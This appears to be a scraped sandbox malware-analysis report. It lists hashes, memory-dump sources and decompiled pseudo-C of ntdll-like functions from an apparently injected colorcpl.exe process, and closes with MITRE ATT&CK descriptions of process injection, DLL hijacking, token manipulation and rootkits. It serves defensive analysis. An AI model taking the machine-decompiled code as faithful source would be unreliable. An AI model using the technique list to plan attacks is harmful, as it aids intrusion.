Instruction Fuzzy Hash: 83E08632150744AFE7319A05DC04F52B7D8DB157B5F00D429E95947D60C779F880CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0433B502 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
Instruction ID: be96875ba3793eff72e9adaf7b22a98bbbd79a0e54d16195994c30b7ff2caf4a
Opcode Fuzzy Hash: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
Instruction Fuzzy Hash: 62D05E32051610AAEB322F15ED09F92BAB5AF40B15F151528B141164F686A5FD84CA90

Uniqueness

Uniqueness Score: -1.00%

Function 0437E4BC Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
Instruction ID: 12f0f01f9918f318508f6a3785ecfd491a54aff76b683c598de5f93d3b1ec71a
Opcode Fuzzy Hash: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
Instruction Fuzzy Hash: 59D0A932204A10ABD732AA1CFC00FC333E8AF88B21F120459B608C7160C364EC81CA80

Uniqueness

Uniqueness Score: -1.00%

Function 043BE588 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
Instruction ID: 8a295c479c4523beaac5291c0d483efeeb862b7cf809ee7e8c919a93a3d7ae1d
Opcode Fuzzy Hash: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
Instruction Fuzzy Hash: 81E0EC369506849FDB12DF59C641F9AB7F5BF84B40F195454A5485B661C624F900CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0433A093 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
Instruction ID: 044a802a85154fb613886847235e66ee4246c1edb7d6b5f7fb557e77edf1665d
Opcode Fuzzy Hash: cd39b431740b0d27950a5382705b11406bf46ab810de4961f59ef8eab177e8e3
Instruction Fuzzy Hash: AED0223220203093CB383740A910F6379089F80A95F0A002C3C0A83800C000DC42D6E0

Uniqueness

Uniqueness Score: -1.00%

Function 0437A750 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
Instruction ID: 44599d7e7c3e1c17b6654a2faab3bdb7d4c7adbda957b3eee74f5c8d7ce3920d
Opcode Fuzzy Hash: 5864ed2f3896c9ef293a2b15130b013708e0d33e54b768a67b2e33eeb472f52c
Instruction Fuzzy Hash: 7AD012371D054DBBDB119F65DC01F957BA9EB94BA0F045020B904875A0CA3AE950D984

Uniqueness

Uniqueness Score: -1.00%

Function 00147B20 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7558000082.0000000000140000.00000040.80000000.00040000.00000000.sdmp, Offset: 00140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_140000_colorcpl.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c41c98b8e309da5ab51e621940081dec8d568e56afddda358075ba9bf69cc631
Instruction ID: 2c102278658520f14493079d5e49cf5e41450f3278016e9f2c5b81c10862992f
Opcode Fuzzy Hash: c41c98b8e309da5ab51e621940081dec8d568e56afddda358075ba9bf69cc631
Instruction Fuzzy Hash: 78B09B37A5601405D6354D4DB8443F1F368D743339F1463D3E808F7514C153C4561149

Uniqueness

Uniqueness Score: -1.00%

Function 0437C620 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
Instruction ID: c05d187a92585fd8dce6589922e729f79c46005e2c7ea2600878231f494be04e
Opcode Fuzzy Hash: 8b26b5d956b916a6823f9d5f3f736f76b5a6e9545a82aefec3b8cf0bc66e7001
Instruction Fuzzy Hash: 7BC08C33290648AFD722EF98CD01F027BA9EB98B40F000021FB048B670C631FC20EA88

Uniqueness

Uniqueness Score: -1.00%

Function 043501C0 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
Instruction ID: 11c1371e117fe1ddf7fe06ae7fc879289158907cf8f5a7dc437b671b4a84fb58
Opcode Fuzzy Hash: 9a34f73ca023a4a6a785f5d272c303ec3737921b4ae57e2e5ea1d679eb78ef85
Instruction Fuzzy Hash: 63D0C93A352D80CFC71ACF0CC894B0573B4FB44B40F850490E801CB722D26CEA40CA00

Uniqueness

Uniqueness Score: -1.00%

Function 04360230 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction ID: d18e8be8d7a355c79a9a7f4423a087189197bdd2eec5c6fd12c22dc91d06fc8d
Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
Instruction Fuzzy Hash: 51D0123610024CEFCB06DF80C850D5A773AFFC8710F109019FD1A076148A31FD62DA50

Uniqueness

Uniqueness Score: -1.00%

Function 04340670 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
Instruction ID: d7f8c994b6947dc1fd2e613a7d98adbba225eb84ffa379158afd34752014c28c
Opcode Fuzzy Hash: 8f322a3ca3a75a15032ed1aea1e35d659c770c91524f9ec55eaf48a423b7bcda
Instruction Fuzzy Hash: D3C00139681A408BDF19CA2AC284E0977E8BB54B95F152890EC068BA21E624EC10CA10

Uniqueness

Uniqueness Score: -1.00%

Function 04377550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E04377550(void* __ecx) {
				signed int _v8;
				char _v548;
				unsigned int _v552;
				unsigned int _v556;
				unsigned int _v560;
				char _v564;
				char _v568;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t49;
				signed char _t53;
				unsigned int _t55;
				unsigned int _t56;
				unsigned int _t65;
				unsigned int _t66;
				void* _t68;
				unsigned int _t73;
				unsigned int _t77;
				unsigned int _t85;
				char* _t98;
				unsigned int _t102;
				signed int _t103;
				void* _t105;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;

				_t45 =  *0x443b370 ^ _t107;
				_v8 =  *0x443b370 ^ _t107;
				_t105 = __ecx;
				if( *0x4436664 == 0) {
					L5:
					return E04384B50(_t45, _t85, _v8 ^ _t107, _t102, _t105, _t106);
				}
				_t85 = 0;
				E0434E580(3,  *((intOrPtr*)(__ecx + 0x18)), 0, 0,  &_v564);
				if(( *0x7ffe02d5 & 0x00000003) == 0) {
					_t45 = 0;
				} else {
					_t45 =  *(_v564 + 0x5f) & 0x00000001;
				}
				if(_t45 == 0) {
					_v556 = _t85;
					_t49 = E04377738(_t105);
					__eflags = _t49;
					if(_t49 != 0) {
						L15:
						_t103 = 2;
						_v556 = _t103;
						L10:
						__eflags = ( *0x7ffe02d5 & 0x0000000c) - 4;
						if(( *0x7ffe02d5 & 0x0000000c) == 4) {
							_t45 = 1;
						} else {
							_t53 = E0437763B(_v564);
							asm("sbb al, al");
							_t45 =  ~_t53 + 1;
							__eflags = _t45;
						}
						__eflags = _t45;
						if(_t45 == 0) {
							_t102 = _t103 | 0x00000040;
							_v556 = _t102;
						}
						__eflags = _t102;
						if(_t102 != 0) {
							L33:
							_push(4);
							_push( &_v556);
							_push(0x22);
							_push(0xffffffff);
							_t45 = E04382B70();
						}
						goto L4;
					}
					_v552 = _t85;
					_t102 =  &_v552;
					_t55 = E043776ED(_t105 + 0x2c, _t102);
					__eflags = _t55;
					if(_t55 >= 0) {
						__eflags = _v552 - _t85;
						if(_v552 == _t85) {
							goto L8;
						}
						_t85 = _t105 + 0x24;
						E043CEF10(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v552);
						_v560 = 0x214;
						E04388F40( &_v548, 0, 0x214);
						_t106 =  *0x4436664;
						_t110 = _t108 + 0x20;
						 *0x44391e0( *((intOrPtr*)(_t105 + 0x28)),  *((intOrPtr*)(_t105 + 0x18)),  *((intOrPtr*)(_t105 + 0x20)), L"ExecuteOptions",  &_v568,  &_v548,  &_v560, _t85);
						_t65 =  *((intOrPtr*)( *0x4436664))();
						__eflags = _t65;
						if(_t65 == 0) {
							goto L8;
						}
						_t66 = _v560;
						__eflags = _t66;
						if(_t66 == 0) {
							goto L8;
						}
						__eflags = _t66 - 0x214;
						if(_t66 >= 0x214) {
							goto L8;
						}
						_t68 = (_t66 >> 1) * 2 - 2;
						__eflags = _t68 - 0x214;
						if(_t68 >= 0x214) {
							E04384C68();
							goto L33;
						}
						_push(_t85);
						 *((short*)(_t107 + _t68 - 0x220)) = 0;
						E043CEF10(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v548);
						_t111 = _t110 + 0x14;
						_t73 = E0438A9C0( &_v548, L"Execute=1");
						_push(_t85);
						__eflags = _t73;
						if(_t73 == 0) {
							E043CEF10(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v548);
							_t106 =  &_v548;
							_t98 =  &_v548;
							_t112 = _t111 + 0x14;
							_t77 = _v560 + _t98;
							_v552 = _t77;
							__eflags = _t98 - _t77;
							if(_t98 >= _t77) {
								goto L8;
							} else {
								goto L27;
							}
							do {
								L27:
								_t85 = E0438A690(_t106, 0x20);
								__eflags = _t85;
								if(__eflags != 0) {
									__eflags = 0;
									 *_t85 = 0;
								}
								E043CEF10(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t106);
								_t112 = _t112 + 0x10;
								E043BCC1E(_t105, _t106, __eflags);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L8;
								}
								_t41 = _t85 + 2; // 0x2
								_t106 = _t41;
								__eflags = _t106 - _v552;
							} while (_t106 < _v552);
							goto L8;
						}
						_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
						_push(3);
						_push(0x55);
						E043CEF10();
						goto L15;
					}
					L8:
					_t56 = E04377648(_t105);
					__eflags = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					_t103 = _v556;
					goto L10;
				} else {
					L4:
					 *(_t105 + 0x34) =  *(_t105 + 0x34) | 0x80000000;
					goto L5;
				}
			}

0x04377560
0x04377562
0x0437756f
0x04377571
0x043775ab
0x043775b9
0x043775b9
0x04377579
0x04377583
0x0437758f
0x043b4443
0x04377595
0x0437759e
0x0437759e
0x043775a2
0x043775bc
0x043775c2
0x043775c7
0x043775c9
0x04377621
0x04377623
0x04377624
0x043775f8
0x043775ff
0x04377601
0x0437762c
0x04377603
0x04377609
0x04377610
0x04377612
0x04377612
0x04377612
0x04377614
0x04377616
0x04377630
0x04377633
0x04377633
0x04377618
0x0437761a
0x043b45c9
0x043b45c9
0x043b45d1
0x043b45d2
0x043b45d4
0x043b45d6
0x043b45d6
0x00000000
0x0437761a
0x043775ce
0x043775d4
0x043775da
0x043775df
0x043775e1
0x043b444a
0x043b4450
0x00000000
0x00000000
0x043b4456
0x043b4469
0x043b4476
0x043b4486
0x043b448b
0x043b4497
0x043b44b9
0x043b44bf
0x043b44c1
0x043b44c3
0x00000000
0x00000000
0x043b44c9
0x043b44cf
0x043b44d1
0x00000000
0x00000000
0x043b44dc
0x043b44de
0x00000000
0x00000000
0x043b44e6
0x043b44ed
0x043b44ef
0x043b45c4
0x00000000
0x043b45c4
0x043b44f7
0x043b44f8
0x043b4510
0x043b4515
0x043b4524
0x043b452b
0x043b452c
0x043b452e
0x043b4556
0x043b4561
0x043b4567
0x043b4569
0x043b456c
0x043b456e
0x043b4574
0x043b4576
0x00000000
0x00000000
0x00000000
0x00000000
0x043b457c
0x043b457c
0x043b4584
0x043b4588
0x043b458a
0x043b458c
0x043b458e
0x043b458e
0x043b459b
0x043b45a0
0x043b45a7
0x043b45ac
0x043b45ae
0x00000000
0x00000000
0x043b45b4
0x043b45b4
0x043b45b7
0x043b45b7
0x00000000
0x043b45bf
0x043b4530
0x043b4535
0x043b4537
0x043b4539
0x00000000
0x043b453e
0x043775e7
0x043775e9
0x043775ee
0x043775f0
0x00000000
0x00000000
0x043775f2
0x00000000
0x043775a4
0x043775a4
0x043775a4
0x00000000
0x043775a4

Strings

CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 043B4460
Execute=1, xrefs: 043B451E
ExecuteOptions, xrefs: 043B44AB
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 043B4507
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 043B4530
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 043B454D
CLIENT(ntdll): Processing section info %ws..., xrefs: 043B4592

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 25c7b211d5e23de23770b5b854bfd6f42f8754bcc8c59e346e46135e4d01fcbe
Instruction ID: c7bc1be57eb0144e4d2ff12e3bcdb732d0ade1034bc61f000192aa4a036762f2
Opcode Fuzzy Hash: 25c7b211d5e23de23770b5b854bfd6f42f8754bcc8c59e346e46135e4d01fcbe
Instruction Fuzzy Hash: 97510831A002197AFF20AF94DD85FED73A8EF08714F0424AAE545A7181EB74BE458F64

Uniqueness

Uniqueness Score: -1.00%

Function 04349046 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E04349046(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t95;
				intOrPtr _t110;
				short _t118;
				signed int _t131;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t146;
				intOrPtr* _t148;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;

				_t141 = __edx;
				_push(0x154);
				_push(0x441be98);
				E04397C40(__ebx, __edi, __esi);
				 *(_t156 - 0xf0) = __edx;
				_t151 = __ecx;
				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
				 *((short*)(_t156 - 0xda)) = 0;
				 *(_t156 - 0xe0) = 0;
				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
				E04388F40(_t156 - 0x13c, 0, 0x3c);
				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t156 - 0x160)) = 1;
				_t131 = 7;
				memset(_t156 - 0x15c, 0, _t131 << 2);
				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
				_t152 = E04359870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
				if(_t152 >= 0) {
					if( *0x44365e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
						goto L1;
					} else {
						_t152 = E0435A170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
						if(_t152 < 0) {
							goto L1;
						}
						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
							L11:
							_t152 = 0xc0150005;
							goto L1;
						}
						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
								 *(_t156 - 0x120) = 0xfffffffc;
							}
						} else {
							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
						}
						_t136 =  *((intOrPtr*)(_t156 - 0x114));
						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
						 *((short*)(_t156 - 0xda)) = _t95;
						 *((short*)(_t156 - 0xdc)) = _t95;
						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
						 *((short*)(_t156 - 0xea)) = 0xaa;
						_t152 = E04365A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
						if(_t152 < 0 || E043604C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
							goto L1;
						} else {
							_t154 =  *0x44365e0; // 0x767da680
							 *0x44391e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
							_t152 =  *_t154();
							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
							if(_t152 < 0) {
								goto L1;
							} else {
								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
								if(_t110 == 0xffffffff) {
									L26:
									 *((intOrPtr*)(_t156 - 4)) = 1;
									_t148 =  *0x44365e8; // 0x750a7740
									if(_t148 != 0) {
										 *0x44391e0(_t110);
										 *_t148();
									}
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									goto L1;
								}
								E0435DC40(_t156 - 0x164, _t110);
								 *((intOrPtr*)(_t156 - 4)) = 0;
								if( *((intOrPtr*)(_t146 + 4)) != 0) {
									E04353B90(_t146);
								}
								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
								_t152 = E04359870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
								if(_t152 < 0) {
									L25:
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									_t110 = E043A247B();
									goto L26;
								} else {
									_t152 = E0435A170(7, 0, 2, _t149, _t156 - 0x140);
									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
									if(_t152 < 0) {
										goto L25;
									}
									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
										_t140 =  *((intOrPtr*)(_t156 - 0x114));
										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
										 *((short*)(_t156 - 0xda)) = _t118;
										 *((short*)(_t156 - 0xdc)) = _t118;
										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
										if(E043604C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
											goto L25;
										}
										_t152 = 0xc0150004;
										L24:
										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
										goto L25;
									}
									_t152 = 0xc0150005;
									goto L24;
								}
							}
							goto L11;
						}
					}
				}
				L1:
				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
				return _t152;
			}

0x04349046
0x04349046
0x0434904b
0x04349050
0x04349055
0x0434905b
0x0434905d
0x04349066
0x0434906f
0x04349078
0x04349080
0x04349088
0x0434908f
0x04349095
0x043490a9
0x043490b1
0x043490be
0x043490c6
0x043490cf
0x043490e2
0x043490f7
0x043490fb
0x04349118
0x00000000
0x04349123
0x0434913b
0x0434913f
0x00000000
0x00000000
0x04349147
0x043a231f
0x043a231f
0x00000000
0x043a231f
0x04349154
0x043a2330
0x043a2336
0x043a2336
0x0434915a
0x0434915a
0x0434915a
0x04349161
0x04349167
0x0434916b
0x04349172
0x04349182
0x0434918e
0x04349199
0x043491ba
0x043491be
0x00000000
0x043491e0
0x043a2358
0x043a2360
0x043a2368
0x043a236a
0x043a2372
0x00000000
0x043a2378
0x043a2378
0x043a2381
0x043a2458
0x043a2458
0x043a245b
0x043a2463
0x043a2468
0x043a246e
0x043a246e
0x043a24a7
0x00000000
0x043a24a7
0x043a238f
0x043a2396
0x043a239c
0x043a239f
0x043a239f
0x043a23bb
0x043a23c8
0x043a23ca
0x043a23d2
0x043a244c
0x043a244c
0x043a2453
0x00000000
0x043a23d4
0x043a23e7
0x043a23e9
0x043a23f1
0x00000000
0x00000000
0x043a23f9
0x043a2402
0x043a2408
0x043a240c
0x043a2413
0x043a2423
0x043a243f
0x00000000
0x00000000
0x043a2441
0x043a2446
0x043a2446
0x00000000
0x043a2446
0x043a23fb
0x00000000
0x043a23fb
0x043a23d2
0x00000000
0x043a2372
0x043491be
0x04349118
0x043490fd
0x04349102
0x0434910e

Strings

@wui", xrefs: 043A245B
$, xrefs: 043490B1
@, xrefs: 04349095

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: $$@$@wui"
API String ID: 0-1882991223
Opcode ID: 5ec6e33d1546d07eb926ee27f0d444a16edab2c446ab14f90b62d28160f189c0
Instruction ID: 19644869ac3322678b5e248baf1561fe2bb419f132e0b0aa54160e5f47b3f078
Opcode Fuzzy Hash: 5ec6e33d1546d07eb926ee27f0d444a16edab2c446ab14f90b62d28160f189c0
Instruction Fuzzy Hash: 9C814DB1D002699BDB35CF54CC45BEEB6B8AF48714F1051EAE909B7250E7706E84CFA0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
